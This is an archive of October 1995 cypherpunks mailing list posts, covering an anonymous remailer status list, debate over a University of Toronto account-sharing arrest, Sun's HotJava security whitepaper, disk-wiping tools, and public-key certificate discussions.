$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk";
$remailer{"wmono"} = "<wmono@spook.alias.net> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ecafe    remail@ecafe.org                 *******#--**    30:29  99.96%
portal   hfinney@shell.portal.com         +#*##**#-###     4:12  99.95%
ideath   remailer@ideath.goldenbear.com   .---.----.-   8:14:14  99.94%
flame    remailer@flame.alias.net         **+**+++-**+    28:29  99.93%
extropia remail@extropia.wimsey.com       -------..--   8:34:49  99.79%
alumni   hal@alumni.caltech.edu           +#*##** -**#     4:44  99.79%
vishnu   mixmaster@vishnu.alias.net       + +***+*-+**    15:35  99.77%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***-##* -#+#    12:48  99.77%
mix      mixmaster@remail.obscura.com     ---+ +-+--+   1:03:29  99.65%
replay   remailer@replay.com              +*++***+-**     13:22  99.43%
hacktic  remailer@utopia.hacktic.nl       **+** *+-**     14:31  99.38%
rmadillo remailer@armadillo.com           + ++  ++-+-     59:29  99.16%
penet    anon@anon.penet.fi               --++ ---- ++  3:15:48  98.47%
wmono    wmono@spook.alias.net             ****++*-+ *    14:26  98.12%
spook    remailer@spook.alias.net         ---- +++- +*  1:19:36  94.96%
rahul    homer@rahul.net                  +### #+  # +     4:11  98.84%
robo     robo@c2.org                      +#*#### -#      24:26  80.99%
c2       remail@c2.org                    + +++-++-+      54:15  76.59%
syrinx   syrinx@c2.org                    ----+-++-+      48:35  75.76%
crown    mixmaster@kether.alias.net       +-+---++      1:03:56  59.66%
gondolin mixmaster@gondolin.org           +*--+ +       1:19:10  44.00%
ford     remailer@bi-node.zerberus.de     *+               6:37  10.73%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 04:18:49 PDT
To: cypherpunks@toad.com
Subject: Re: LACC: Account sharing leads to false imprisonment
In-Reply-To: <199510090843.SAA29314@suburbia.net>
Message-ID: <9510091116.AA15078@all.net>
MIME-Version: 1.0
Content-Type: text


Thought you might like another perspective:

...
>                             A GORRIE STORY
> 
> Here's the background: in October of 1994, Hirsh's stepbrother, a U of
> T grad student, said Hirsh could use his school-provided net account.

Almost certainly unauthorized use.  The us of another person's account
is almost always against school policy, and hence is likely to be a
voilation of the law.

> Hirsh used it to read news. He thought the net fascinating so began
> uploading copies of The Anarchives. Hirsh never tried to hide who he
> was -- he even included his home phone number, which is how the Super-
> Sleuth Sysadmins "found" him. Hirsh made similar use of an account
> belonging to "Ms X" -- a female Ph.D. student and friend of Stepbro's.

Ignorance of the law is no excuse, and being easy to catch doesn't make
you innocent of a crime.

> This would have been a happy and otherwise normal arrangement except
> that in January, 1995, U of T engineering prof Jack Gorrie
> (gorrie@ecf.utoronto.ca), bossman of U of T's engineering computing
> facility computer, received a complaint from someone at the University
> of British Columbia about The Anarchives being posted to net news. The
> person wanted it stopped.

Interstate transport of stolen (presumably copyrighted) property, possible
violation of national laws of both nations.  Unauthorized use of the
computers at the University of British Columbia.

> Gorrie came to notice Ms X wasn't signing these documents, a Jesse
> Hirsch was. He also noticed Hirsh and another U of T student (the
> stepbro) exchanged email about the accounts. As Hirsh and his stepbro
> have different last names, Gorrie concluded a larger hacker conspiracy
> was afoot.

Reasonable assumption.  The only way to find out different would be to
violate the users' privacy by reading their mail, etc.

> Gorrie launched into his Canadian rendition of Cliff Stoll, author of
> compu-crime-thriller _The Cuckoo's Egg_ -- in Gorrie's case, _The
> Loonie's Egg_. He "tracked" Hirsh for two months, recording every
> keystroke -- even though he had all three students' phone numbers.

Collected possible evidence.  A good idea.  Allerting potential criminals
is a poor way to catch them and potentially dangerous.  May not stand up
in court as it is heresay - not exempt under the normal business record
exception.

> On March 8, 1995, he asked the cops to intervene. "I checked and found
> that the account was indeed being used to broadcast information on
> behalf of The Anarchist Organization," he wrote Detective Hugh
> Ferguson.

Sounds wise.

> Thus it came to be that Jesse Hirsh was forced to model nude for
> Toronto's finest, with the blessing of U of T.

If he turned out to be a terrorist who was planning to blow up a
building, you would have called this a tremendous piece of police work,
they could have written a million-selling book, and you would hail the
sysadmin as a computer age hero.

> Stepbro got his own taste of U of T six-gun justice. Off in a
> Washington, D.C., engineering lab, he came under FBI investigation.
> Naturally, the FBI found nothing wrong because there was nothing wrong
> -- except for an over-zealous sysadmin using a meat cleaver to scratch
> an itch.

Try again.  I assume that they found this was not a "real" terrorist. 
But to call it over-zealous is not right.  S/he was doing the job and
should be commended for trying to do it as well as s/he could.

>                            CHARGES DROPPED
> 
> On Sept. 7, minutes before the case was to go to court, the
> prosecution dropped all charges. Hirsh agreed to pay a token
> settlement of $400 for four months of university computer use. U of T
> first claimed it was owed $1,560. Hirsh places the real cost at $60.

So Hirsh agreed that he had been illegally using the computer system
and the case was settled with a monetary fine.

> Hirsh devoted an issue of The Anarchives to the case. It spread around
> cyberspace. In it, Hirsh includes Gorrie's email address and asks
> people to send him their opinions. Quite a few did. They were rather
> unpleasant. Gorrie, miffed, used the U of T pipeline to have the
> stepbro make Hirsh shut up.

So what's fair for Hirsh is not fair for the Sysadmin? Sounds to me like
you think it's OK for Hirsh to have people write nasty letters to the
admin but not OK for the admin to respond via the step-brother.

> After subjecting Hirsh to complete and devastating public humiliation,
> U of T was now pleading for discretion.

After Hirsh broke the law, he is trying to get even for being caught by
harassing the people who caught him.

...

> Hirsh wrote Gorrie privately, saying he was sorry Gorrie was getting nasty
> mail. Gorrie replied the whole affair was a "big misunderstanding." As
> they were _both_ misled, they were _both_ victims: Victim Hirsh was
> dragged down the street in handcuffs, fingerprinted, mugshotted,
> strip-searched and jailed for hours; Victim Gorrie received email that was
> mean to him.

Hirsh realized he was wrong to harass Gorrie and appologized for creating
the situation.  Gorrie gracefully called it a "big misunderstanding" and
accepted the abuse as part of doing a tough job.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Oct 95 04:52:00 PDT
To: cypherpunks@toad.com
Subject: GOB_ble
Message-ID: <199510091151.HAA05403@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-9-95. NYPaper:


   "Is the top priority in computing shifting from speed to
   how easily you can interact? How fast will the
   Microsoft-Intel duopoly fade?" Denise Caruso's column

      When the Internet's original creators decided to publish
      their networking standards so that any computer could
      connect to the network, they certainly had no idea that
      almost 30 years later, their decision would provide the
      first real lever to pry the Microsoft-Intel duopoly from
      its leadership role. But this very prospect is why one
      well-known technology investor made a speech last week
      called, "Why Microsoft and Intel Don't Matter Anymore."


   "Haves and Have-Nots Revisited. Rich Nations Talk
   High-Tech, but the Poor Live No-Tech."

      Digital technology is revolutionizing telecommunications
      and erasing the boundaries that separate the telephone,
      computer and media industries. But the revolution's
      inequality takes the shine off a business that has
      celebrated itself as both a one-stop shop for the
      Information Age and a force for positive political
      change in the world. "The present reality is that the
      technology gap between developed and developing nations
      is actually widening," said Nelson Mandela, who spoke at
      Telecomm 95's opening.


   "A software gift service, by lawsuit and negotiation, tries
   to demonstrate that it takes its claim seriously." Sandra
   Chartrand's Patents column.

      One controversy is a patent issued in 1985 for selling
      software to individuals through the Internet and some
      CD-ROM's. Its owner, Interactive Gift Express Inc. says
      the patent covers the selling and downloading of digital
      information. There are those who disagree. "I've read
      the patent and can actually say that there is no
      invention there at all," said Richard Stallman at MIT.


   Trio: GOB_ble  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 08:17:51 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: The problem with Java
In-Reply-To: <9510091042.AA13473@all.net>
Message-ID: <Pine.SOL.3.91.951009081514.13505B-200000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain

I'm not sure how many people here have read the paper on java security 
that is included with the distribution - I'm including the html source at 
the end of the message. That gives some more information on what Sun does 
and does not claim. That makes it easier to verify whether or not those 
claims are correct, and whether they are sufficient for whatever level of 
security.

The document can also be found at 

http://www.javasoft.com/1.0alpha3/doc/security/security.html

Simon


<HTML>

<HEAD>

<TITLE>HotJava: The Security Story</TITLE>

</HEAD>

<BODY>

 <P>

<A NAME=HEADING1></A>

<H1><img src=Boxer.gif align=middle> HotJava(tm): The Security Story</H1>

<HR>

HotJava(tm)  is a world wide web (WWW) browser, built using a new language called Java. Perhaps the most significant new facility that HotJava implements is the ability to import code fragments across the net and execute them. One of the most important technical challenges in building a system like HotJava is to make it safe. Importing code fragments across the network, installing, and running them is an open invitation to security problems. <P>

The question of how to provide a secure environment for code to execute in doesn't have a single answer. HotJava has layers of interlocking facilities that provide defenses against a variety of attacks. These layers are:<P>

<UL>

<LI>The JavaTM  language, which was designed to be a safe language and the Java compiler which ensures that source code doesn't violate the safety rules.<P>

<LI>A verification of the byte codes imported into the runtime to ensure that they obey the language's safety rules. This layer guards against an altered compiler producing code that violates the safety rules.<P>

<LI>A class loader which ensures that classes don't violate name space or access restrictions when they are loaded.<P>

<LI>Interface-specific security that prevents applets from doing destructive things. It depends on the security guarantees of the previous layers. This layer depends on the integrity guarantees from the other three layers.<P>

</UL>

<A NAME=HEADING2></A>

<HR>

<H2>Security layer one: the language and compiler</H2>

The Java language and the compiler comprise the first line of security for HotJava. Java was designed to be a safe language. <P>

Initially, the development team thought that by adding safety features to an existing language such as C++, the safety goals could be achieved. However, as work progressed it became clear that this strategy would not succeed without putting some restrictions on C++. <P>

C++ has a series of facilities to control access to objects, but it also has ways to forge access to objects and to sub-parts of objects that defeat the access controls. The C++ facilities that allow forging have either been eliminated in Java or changed to make them safe. Most importantly, you can't do pointer arithmetic; in fact you can't modify pointers in any way. However, Java has true arrays instead of pointer arithmetic. And because the primary use of pointer arithmetic in C and C++ is to access arrays, programmers often don't notice the change. Another example is the "cast" operator: the Java compiler checks that a cast is legal, whereas C and C++ do not. <P>

<A NAME=HEADING3></A>

<HR>

<H2>Security layer two: verifying the bytecodes</H2>

A trustworthy compiler ensures that Java source code doesn't violate the safety rules, but someone could alter the compiler to produce code that violates them. HotJava, which can import code fragments from anywhere, doesn't know whether a code fragment comes from a trustworthy compiler or not. So, before executing any code fragment, the runtime system subjects it to a series of tests.<P>

The tests range from verification that the format of the fragment is correct, to passing it through a simple theorem prover to establish that the code plays by the rules. The code is checked to ensure: <P>

<UL>

<LI>that it doesn't forge pointers<P>

<LI>that it doesn't violate access restrictions<P>

<LI>that it accesses objects as what they are. (For example, the tests ensure that "InputStream" objects are always used as "InputStreams" and never as anything else.)<P>

<LI>that it calls methods with appropriate arguments of the appropriate type<P>

<LI>that there are no stack overflows<P>

</UL>

The representation of code fragments loaded into the runtime is a byte coded machine-independent instruction set that bears a resemblance to representations like the UCSD Pascal P-Codes[Bowles78], i.e., it is stack based. <P>

Consider the following Java code sample: <P>

<PRE>

class vector {

    int arr[];

    int sum() {

        int la[] = arr;

        int S = 0;

        for (int i=la.length; --i&gt;=0;)

            S += la[i];

        return S;

    }

}

</PRE>

The byte codes generated when the above code is compiled look like the following:<BR><IMG SRC="security-whitepaper_Tbl_10.gif"><BR>

<P>

<A NAME=HEADING4></A>

<HR>

<H2>Type information</H2>

Java bytecodes contain more type information than is strictly necessary for the interpreter. For example, both the aload and iload opcodes have identical implementations, however, aload is used to load a pointer and iload is used to load an integer. Similarly, the getfield opcode has a symbol table reference; the symbol table has type information. This "extra" type information allows the runtime system to perform checks that guarantee that type information isn't being illegally manipulated. <P>

Most stack based instruction sets don't limit what you can do with the stack and local variables. Conceptually, at any point in the program each slot in the stack and each local variable has a type. This collection of type information, i.e., all the slots and local variables, is called the type state of the execution frame. An important property of the type state is that this type can be determined statically by induction, i.e., before any program code is executed. As the runtime systems reads through a block of instructions, each instruction pops and pushes values of particular types. Instruction definitions are required to have the following inductive property:<P>

<BLOCKQUOTE>

<I>Given only the type state before the execution of the instruction, the type state afterwards is determined.</I><P>

</BLOCKQUOTE>

Given a straight-line block of code, i.e., no branches, and starting with a known stack state, the type state of each slot in the stack is known. For example:<P>

<PRE>

	iload_1	Load integer variable, stack type state=I

	iconst 5	Load integer constant, stack type state=II

	iadd	Add two integers producing an integer, stack type state=I

</PRE>

A number of stack-based instruction sets, like Smalltalk [Adobe85] do not have this property. For example, the definition of the PostScript add operator explicitly states "If both operands are integers and the result is within integer range, the result is an integer, otherwise the result is a real." In many situations this dynamic type behavior is considered to be an advantage, but HotJava needs to provide a secure execution environment and it must know the types of objects in order to guarantee a certain level of security. <P>

In conjunction with the inductive property above we require that:<P>

<BLOCKQUOTE>

<I>When there are two execution paths into the same point, they must arrive there with exactly the same type state.</I><P>

</BLOCKQUOTE>

This requirement has several implications. For example, compilers cannot write loops that iterate through arrays, loading each element of the array onto the stack, effectively copying the array onto the stack. This behavior is prevented because the flow path into the top of the loop will have a different type state than the branch back to the top. Because all paths to a point are required to arrive with the same type state, the type state from any incoming path can be used to do further manipulations.<P>

Code is checked for compliance with these rules by a part of the loader called the verifier. It traverses the byte codes, constructs the type state information, and verifies the types of the parameters to all the opcodes. The following illustration shows the flow of code from Java source code to execution by the runtime system.<BR><IMG SRC="security-whitepaper_AFrame_4.gif"><BR>

<P>

The verifier acts as a gatekeeper by preventing the execution of imported code until it has passed the verifier's tests. When code verification is complete a number of important properties of the code are known:<P>

<UL>

<LI>The code causes no operand stack overflows or underflows.<P>

<LI>The types of the parameters to all opcodes are known to always be correct.<P>

<LI>No illegal data conversions are done, like converting integers to pointers.<P>

<LI>Object field accesses are known to be legal (i.e., the verifier checks that the rules for public, private, and protected accesses are obeyed).<P>

</UL>

Knowing these properties makes the runtime system much faster because it doesn't have to check anything. There are no operand type checks and no stack overflow checks. The runtime can eliminate these checks without compromising safety.<P>

These properties also provide a foundation for the security of the system:<P>

<UL>

<LI>pointers can be treated essentially as capabilities <P>

<LI>applications cannot forge pointers, e.g., casting an integer to a pointer<P>

<LI>applications cannot get around pointers<P>

<LI>all the access restrictions are enforced <P>

</UL>

So, in HotJava, you can trust that a private variable really is private, that no piece of application code is doing some magic with casts to extract information from a private variable, for example, a credit card number from the billing software. This means that implementing security for HotJava against destructive applets is easier to do. HotJava security has to deal with restricting file access and the ability of applets to grab files and throw them over firewalls. The HotJava security implementation doesn't have to worry about threats like hacked bytecodes forging access to private methods or overflowing the stack.<P>

<A NAME=HEADING5></A>

<HR>

<H2>Security level three: the class loader</H2>

After the initial runtime environment checks are passed, code encounters a class loader. The environment seen by a thread of execution running Java byte codes can be visualized as a set of classes partitioned into namespaces. The class loader guarantees that a unique namespace exists for classes that come from the local file system (called built-ins), and a unique namespace exists for each network source. When HotJava imports a class across the network the Class Loader places it into the private namespace associated with its origin. Thus, classes imported from different places are partitioned from each other.<P>

When a class references another class, the runtime system first looks for it in the namespace of the built-ins, then in the namespace of the referencing class. There is no way that an imported class can "spoof" a built-in class. Built-ins can never accidentally reference classes in imported namespaces, they can only do it explicitly. Spoofing is prevented because the system always checks built-in classes first.<P>

<A NAME=HEADING6></A>

<HR>

<H2>Security level four: protecting the file system and network access</H2>

HotJava enforces security policies confident that its security interfaces are secure. The three lower levels of security guarantee that all local classes, e.g., the file access primitives, are themselves protected from being supplanted, replaced, or extended by imported code. <P>

The file access primitives implement an access control list that controls read and write access to files by imported code (or code invoked by imported code). The defaults for these access control lists are very restrictive. If an attempt is made by a piece of imported code to access a file to which access has not been granted, a dialog box pops up to allow the user to decide whether or not to allow that specific access. These security policies err on the conservative side in order to ensure maximum security. This conservative approach may make writing some applets more difficult or awkward.  <P>

For network security, HotJava provides a variety of mechanisms that can provide information about the trustworthiness of imported code. These mechanisms cover a wide range of possibilities. At the simple end the system can check on the origin of a code fragment to determine if it came from inside or outside a firewall. At the sophisticated end of the range a mechanism exists whereby public keys and cryptographic message digests can be securely attached to code fragments that not only identify who originated the code, but guarantee its integrity as well. This latter mechanism will be implemented in future releases.<P>

The security policies implemented by the runtime system can be dynamically adjusted based on the information available concerning the origin of a code fragment. The Socket class provides such an example. <P>

The Socket class implements security policies that are adjusted to reflect the trustworthiness of the code that invoked it, and transitively, the code that invoked the invoker. The information about what code began the chain of execution is available to the class in the form of which namespace contains the invoking code and what parameters are associated with that class. The class loader puts the classes it has loaded in a specific namespace, allowing the Socket class to determine the network host from which a class is loaded. <P>

Knowing the network host allows the HotJava security mechanism to determine whether the class originated inside or outside a firewall. Knowledgable users of HotJava can decide which category of hosts to trust when loading executable code. For example, the Socket class can implement the policy of only allowing new connections to be created that terminate at the host from whence the code was loaded. This restriction means that code loaded from outside a firewall cannot connect to other machines on the net behind the firewall. Code that comes from more trusted sources can be allowed more freedom to make connections to other machines. As an additional defense against untrusted sources HotJava's security can be set to prevent any code from being loaded. The level of security is configurable by HotJava users.<P>

<A NAME=HEADING7></A>

<HR>

<H2>Summary</H2>

The security in HotJava provides a safe environment for the execution of imported code. The security is based on interlocking layers of security that range from the design of the Java language at the base to the file and network access protections at the top. In the future HotJava will support network commerce through the inclusion of public key encryption technology.<P>

<A NAME=HEADING8></A>

<HR>

<H2>Bibliography</H2>

<DL>

<DT><A NAME=1>[Adobe85]

<dd>Adobe Systems Incorporated, "PostScript Language Reference Manual", Addison Wesley.

<DT><A NAME=2>[Aho86]

<dd>Aho, Alfred V., Ravi Sethi, Jeffrey D. Ullman, "Compilers: Principles, Techniques and Tools", Addison Wesley.

<DT><A NAME=3>[Bowles78]

<dd>Bowles, Kenneth L, "UCSD Pascal", Byte. 46 (May)

<DT><A NAME=4>[Chambers92]

<dd>Chambers, Craig, David Ungar, and Elgin Lee. An Efficient Implementation of Self, a Dynamically-Typed Object-Oriented Language Based on Prototypes. In OOPSLA `89 Conference Proceedings, p. 49-70, New Orleans, LA, October 1989. Published as SIGPLAN Notices 24(10), October 1989. Also published in Lisp and Symbolic Computation 4(3), Kluwer Academic Publishers, June 1991.

<DT><A NAME=5>[Duetsch84]

<dd>Deutsch, L. Peter and Alan Schiffman, "Efficient Implementation of the Smalltalk-80 System." Proceedings of the 11th Symposium on the Principles of Programming Languages, Salt Lake City, UT, 1984

<DT>[Goldberg83]

<dd>Goldberg, Adele and David Robson, "Smalltalk-80: The Language and its Implementation", Addison Wesley.

</DL>

</BODY>

</HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Mon, 9 Oct 95 08:23:45 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951009082105.18953G-100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

> 
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> 
> Perry
> 
PCTools has such a utility.  Claims DoD specs.

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 08:55:40 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951008185136.29595B-100000@rwd.goucher.edu>
Message-ID: <199510091554.IAA20941@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jon Lasser <jlasser@rwd.goucher.edu> writes:
>I think Hal and some other Cypherpunks (Me, You, Carl, etc.) are not 
>proceeding from one of the same assumptions.  Specifically, Hal seems to 
>be proceeding from the assumption that the person "on the other end of 
>the line" is in fact a known physical entity who has a meat reputation 
>tied to the name.  I'm proceeding from the assumption that the person on 
>the other end of the line has no specific RL reputation that I'm basing 
>the relationship on, just the online one.

>Here's an example:
>There's someone on the list, now, apparently, with the name of "Steven 
>Levy."  Hal assumes that, when communicating with that "Steven Levy," one 
>intends to communicate with the fairly-well-known journalist of that 
>name, and thus  certification of RL identity is important.  I assume 
>that, unless there's a specific reason otherwise, I want to have an 
>intellectual conversation (or financial transaction, etc) that isn't 
>predicated on this being "the" Steven Levy.  In that case, certification 
>of RL identity is irrelevant.

That is not exactly my point.  My concern is avoiding the man in the
middle attack.  One way to do that is to find a certificate from Verisign
saying that this key belongs to Steven Levy, ideally with other
information that I can confirm relates to the on-line personage I wish to
speak to.  Presumably the MITM can't get a certificate for Steven Levy,
unless by coincidence his name actually is Steven Levy, in which case the
other information I mentioned will be helpful as well.

Would you propose just to use an unsigned key that says it is for
Steven Levy?  Or perhaps a key without any name at all that someone
told you was for him?  That is the policy which I have been arguing
against.  The whole idea of communicating with keys, or not having key
certificates or signatures, seems to me to leave open the possibility
of man in the middle attacks.  Isn't this a problem?  Or are the
difficulties of mounting a MITM attack considered so large that they can be
neglected?  I would just like to hear exactly what are the assumptions
being made regarding this problem by those who oppose certificates.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 9 Oct 95 08:58:54 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <199510091558.IAA05131@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 AM 10/9/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>>I don't understand this whole discussion.  A certificate is a signed
>>binding of a key and a unique name, right?
>It depends on how you define certificate.  If you define it this way, then
>I'm proposing the elimination of certificates (because I'm eliminating the
>unique name as something different from a key).
>
>If you define certificate as I do -- as a bound statement of some attribute
>of a key, then it should become clearer.  It's just that the attribute I'm
>binding is not some unique person-name -- rather something like permission
>to spend money from a bank account.

This doesn't necessarily eliminate certificates - while you have a signed
statement from Alice's key that she uses Bank Account X, and a signed statement
from Alice's key authorizing transfer of $D from Bank Account X to Bank
Account Y,
the Bank, or a customer, may refuse to accept the request unless there's 
a signed statement from the Bank's key that Alice's key uses Account X.
None of these need Alice's name, or for that matter the Bank's, as long as
there's
also a signed attribute statement from the Bank's key that it's a bank, etc. 
The meaning of the certificates changes a bit, but there's still a certificate
from the bank binding Alice's Key to Alice's Bank Account.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 06:18:29 PDT
To: cypherpunks@toad.com
Subject: PC disk wipe software
Message-ID: <199510091318.JAA24166@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I thought I'd ask here, since its related to a lot of the stuff people
have written for the PC platform in these parts. I need to securely
wipe a bunch of data from an MS-DOS hard drive, so that it can't be
recovered. Are there any readily available utilities for this? Will
any of them selectively erase only data that isn't allocated to
existing files?

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Mon, 9 Oct 95 10:11:17 PDT
To: perry@piermont.com
Subject: java security concerns
Message-ID: <9510091642.AA28211@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



Perry pointed out the standard set of concerns that anyone should have with
Java. About the only thing I'd care to dispute at the moment is that Java
is a "large complicated" application. It is in fact less than 20K lines of
C code. And while it is true that applications of even this size are
difficult to prove safe, there has been an effort to break that problem
up into components such that each "layer" can be proven safe and where
that layer is used that safety carries over. Let me give you an example:

There are three "parts" of the Java system:
	o Java Bytecode
	o Java Runtime
	o Java Virtual Machine.

At a "meta" level there is the Java Language and the compiler that converts
it into byte codes however for the purposes of a security discussion those
are irrelevant since the browser in this case receives byte codes and the
compiler at the other end is presumed suspect.

So one way to approach this analysis is to look first at the bytecodes. One
of the things you will discover is that Java is *not* a general purpose 
language. It lacks crucial features such as introspection and anonymous
memory access. So you might ask "How can anyone write anything useful in it
then?" and that is a fair question. The answer is that it does have one
loophole and that loophole is the 'native' keyword on a method description.
Basically, if you need a general purpose feature (like object inspection)
you can get it with a native method. "So I write a native method to delete
your files, what does that buy me?" you might ask. Well Java is also a 
_late binding_ language. Thus the binding of external method references
(which native methods are by definition one) can be identified at bind/link
time (which always occurs on the client) and optionally rejected.

The next level of inspection is all of the classes that, through one of their
methods, actually call a native method. Those can be analyzed closely and
there are relatively few of them (about 28).

The final level of inspection is the virtual machine interpreter. Its 
operation as a giant switch statement can be inspected for valid code
design. It isn't all that large and a team of three can inspect it in under
a week. 

If the layers work, the system works. We encourage any questions on security
or identifying any "holes" to be sent to java@java.sun.com for our immediate
attention.

--Chuck



However, Java is also late




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 09:47:24 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510091558.IAA05131@ix6.ix.netcom.com>
Message-ID: <199510091646.JAA29034@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
>This doesn't necessarily eliminate certificates - while you have a signed
>statement from Alice's key that she uses Bank Account X, and a signed statement
>from Alice's key authorizing transfer of $D from Bank Account X to Bank
>Account Y,
>the Bank, or a customer, may refuse to accept the request unless there's 
>a signed statement from the Bank's key that Alice's key uses Account X.
>None of these need Alice's name, or for that matter the Bank's, as long as
>there's
>also a signed attribute statement from the Bank's key that it's a bank, etc. 
>The meaning of the certificates changes a bit, but there's still a certificate
>from the bank binding Alice's Key to Alice's Bank Account.

I can see using keys with attributes in this way, for credentials or as
other forms of authorization.  But what about for communications privacy?
What is the attribute that tells you that using this key will prevent
eavesdropping?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 06:55:36 PDT
To: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Subject: Re: LACC: Account sharing leads to false imprisonment
In-Reply-To: <199510091346.OAA24239@neptune.ebi.ac.uk>
Message-ID: <199510091355.JAA24223@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Is this really cypherpunks material?

.pm

"J. R. Valverde (EMBL Outstation: the EBI)" writes:
> 
> Amazing! If I'm allowed to express my opinion!
> 
> >Thought you might like another perspective:
> >
> >...
> >>                             A GORRIE STORY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 07:58:31 PDT
To: jps@monad.semcor.com (Jack P. Starrantino)
Subject: Re: netscape  mail starts java attachments upon get new mail...
In-Reply-To: <9510091445.AA01297@monad.semcor.com>
Message-ID: <9510091458.AA27858@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Jack P. Starrantino writes:
 > Given JAVA's i/o capabilities

Java, per se, doesn't have any "I/O capabilities", in the same way
that neither C nor C++ do.  That said, it is the case that if your
mail reader allows incoming applets to send mail, you're in for
trouble.  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 9 Oct 95 07:07:00 PDT
